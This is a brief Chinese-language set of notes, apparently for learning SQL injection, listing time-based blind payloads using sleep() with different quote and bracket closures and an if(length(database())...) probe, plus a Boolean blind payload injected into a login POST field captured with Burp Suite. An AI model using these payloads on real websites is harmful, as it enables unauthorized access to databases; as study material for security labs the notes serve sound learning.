提示:
一、没有任何报错的时候 if([条件],[true],[false])
?id = 1 and sleep(3) --+ # 没有任何报错的时候
?id = 1' and sleep(3) --+
?id = 1') and sleep(3) --+
?id = 1 " and sleep(3) --+
# 下面更改闭合方式
结合 if 使用
?id = 1 and if(length(database()) > 1 , sleep(3),1) --+ # 没有任何报错的时候
二,通过 post 抓包 进行Boole盲注(猜库)
输入账号密码 使用bp 抓包
1.进行Boole盲注(猜库)
uname=zhao' or length(database())>1 --+